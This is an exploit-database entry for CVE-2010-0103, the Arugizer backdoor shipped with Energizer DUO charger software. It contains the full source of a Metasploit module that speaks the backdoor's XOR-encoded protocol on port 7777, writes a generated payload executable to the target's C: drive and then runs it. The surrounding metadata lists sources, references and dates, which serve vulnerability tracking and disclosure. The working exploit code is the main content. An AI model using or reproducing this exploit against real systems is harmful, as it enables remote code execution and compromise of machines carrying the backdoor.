ID

VAR-E-201003-0761


CVE

cve_id:CVE-2010-0103

Trust: 2.4

sources: BID: 38571 // PACKETSTORM: 87042 // EXPLOIT-DB: 16390 // EDBNET: 39083

EDB ID

16390


TITLE

Arugizer Trojan Horse (Energizer DUO) - Code Execution (Metasploit) - Windows remote Exploit

Trust: 0.6

sources: EXPLOIT-DB: 16390

DESCRIPTION

Arugizer Trojan Horse (Energizer DUO) - Code Execution (Metasploit). CVE-2010-0103, OSVDB-62782. Remote exploit for the Windows platform.

Trust: 0.6

sources: EXPLOIT-DB: 16390

AFFECTED PRODUCTS

vendor: arugizer | model: trojan horse | scope: - | version: -

Trust: 1.0

vendor: energizer | model: duo trojan | scope: - | version: -

Trust: 0.5

vendor: energizer | model: duo | scope: eq | version: 0

Trust: 0.3

sources: BID: 38571 // PACKETSTORM: 87042 // EXPLOIT-DB: 16390

EXPLOIT

##
# $Id: energizer_duo_payload.rb 10389 2010-09-20 04:38:13Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::EXE

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Energizer DUO Trojan Code Execution',
      'Description'    => %q{
          This module will execute an arbitrary payload against
        any system infected with the Arugizer trojan horse. This
        backdoor was shipped with the software package accompanying
        the Energizer Duo USB battery charger.
      },
      'Author'         => [ 'hdm' ],
      'License'        => MSF_LICENSE,
      'Version'        => '$Revision: 10389 $',
      'References'     =>
        [
          ['CVE', '2010-0103'],
          ['OSVDB', '62782'],
          ['US-CERT-VU', '154421']
        ],
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'Automatic', { } ],
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Mar 05 2010'
    ))

    register_options(
      [
        Opt::RPORT(7777),
      ], self.class)
  end

  # The backdoor XORs every byte of its protocol stream with 0xE5;
  # the same operation both encodes and decodes.
  def trojan_encode(str)
    str.unpack("C*").map{|c| c ^ 0xE5}.pack("C*")
  end

  # Each backdoor command is named by a GUID string. The wire format is a
  # little-endian 32-bit length (GUID plus NUL terminator) followed by the
  # NUL-terminated GUID, all passed through trojan_encode.
  def trojan_command(cmd)
    cid = ""

    case cmd
    when :exec
      cid = "{8AF1C164-EBD6-4b2b-BC1F-64674E98A710}"
    when :dir
      cid = "{0174D2FC-7CB6-4a22-87C7-7BB72A32F19F}"
    when :write
      cid = "{98D958FC-D0A2-4f1c-B841-232AB357E7C8}"
    when :read
      cid = "{F6C43E1A-1551-4000-A483-C361969AEC41}"
    when :nop
      cid = "{783EACBF-EF8B-498e-A059-F0B5BD12641E}"
    when :find
      cid = "{EA7A2EB7-1E49-4d5f-B4D8-D6645B7440E3}"
    when :yes
      cid = "{E2AC5089-3820-43fe-8A4D-A7028FAD8C28}"
    when :runonce
      cid = "{384EBE2C-F9EA-4f6b-94EF-C9D2DA58FD13}"
    when :delete
      cid = "{4F4F0D88-E715-4b1f-B311-61E530C2C8FC}"
    end

    trojan_encode(
      [cid.length + 1].pack("V") + cid + "\x00"
    )
  end

  def exploit

    # Random NUL-terminated destination path and the NUL-terminated payload EXE
    nam = "C:\\" + Rex::Text.rand_text_alphanumeric(12) + ".exe" + "\x00"
    exe = generate_payload_exe + "\x00"

    print_status("Trying to upload #{nam}...")
    connect

    # Write file request: command, then length-prefixed name and contents
    sock.put(trojan_command(:write))
    sock.put(trojan_encode([nam.length].pack("V")))
    sock.put(trojan_encode(nam))
    sock.put(trojan_encode([exe.length].pack("V")))
    sock.put(trojan_encode(exe))

    # Required to prevent the server from spinning a loop
    sock.put(trojan_command(:nop))

    disconnect

    #
    # Execute the payload
    #

    print_status("Trying to execute #{nam}...")

    connect

    # Execute file request: command, then length-prefixed name
    sock.put(trojan_command(:exec))
    sock.put(trojan_encode([nam.length].pack("V")))
    sock.put(trojan_encode(nam))

    # Required to prevent the server from spinning a loop
    sock.put(trojan_command(:nop))

    disconnect
  end
end

Trust: 1.0

sources: EXPLOIT-DB: 16390

EXPLOIT LANGUAGE

rb

Trust: 0.6

sources: EXPLOIT-DB: 16390

PRICE

free

Trust: 0.6

sources: EXPLOIT-DB: 16390

TYPE

Code Execution (Metasploit)

Trust: 1.0

sources: EXPLOIT-DB: 16390

TAGS

tag:Metasploit Framework (MSF)

Trust: 1.0

tag:exploit

Trust: 0.5

tag:arbitrary

Trust: 0.5

tag:trojan

Trust: 0.5

sources: PACKETSTORM: 87042 // EXPLOIT-DB: 16390

CREDITS

Metasploit

Trust: 0.6

sources: EXPLOIT-DB: 16390

EXTERNAL IDS

db: NVD | id: CVE-2010-0103

Trust: 2.4

db: EXPLOIT-DB | id: 16390

Trust: 1.6

db: CERT/CC | id: VU#154421

Trust: 1.4

db: 0DAYTODAY | id: 9699

Trust: 0.6

db: EDBNET | id: 9702

Trust: 0.6

db: EDBNET | id: 39083

Trust: 0.6

db: PACKETSTORM | id: 87042

Trust: 0.5

db: BID | id: 38571

Trust: 0.3

sources: BID: 38571 // PACKETSTORM: 87042 // EXPLOIT-DB: 16390 // EDBNET: 9702 // EDBNET: 39083

REFERENCES

url:https://nvd.nist.gov/vuln/detail/cve-2010-0103

Trust: 2.1

url:https://0day.today/exploits/9699

Trust: 0.6

url:https://www.exploit-db.com/exploits/16390/

Trust: 0.6

url:http://www.energizer.com/pages/default.aspx

Trust: 0.3

url:http://www.kb.cert.org/vuls/id/154421

Trust: 0.3

sources: BID: 38571 // PACKETSTORM: 87042 // EXPLOIT-DB: 16390 // EDBNET: 9702 // EDBNET: 39083

SOURCES

db: BID | id: 38571
db: PACKETSTORM | id: 87042
db: EXPLOIT-DB | id: 16390
db: EDBNET | id: 9702
db: EDBNET | id: 39083

LAST UPDATE DATE

2022-07-27T09:59:23.676000+00:00


SOURCES UPDATE DATE

db: BID | id: 38571 | date: 2010-03-18T15:22:00

SOURCES RELEASE DATE

db: BID | id: 38571 | date: 2010-03-05T00:00:00
db: PACKETSTORM | id: 87042 | date: 2010-03-09T22:50:14
db: EXPLOIT-DB | id: 16390 | date: 2010-09-20T00:00:00
db: EDBNET | id: 9702 | date: 2010-03-18T00:00:00
db: EDBNET | id: 39083 | date: 2010-09-20T00:00:00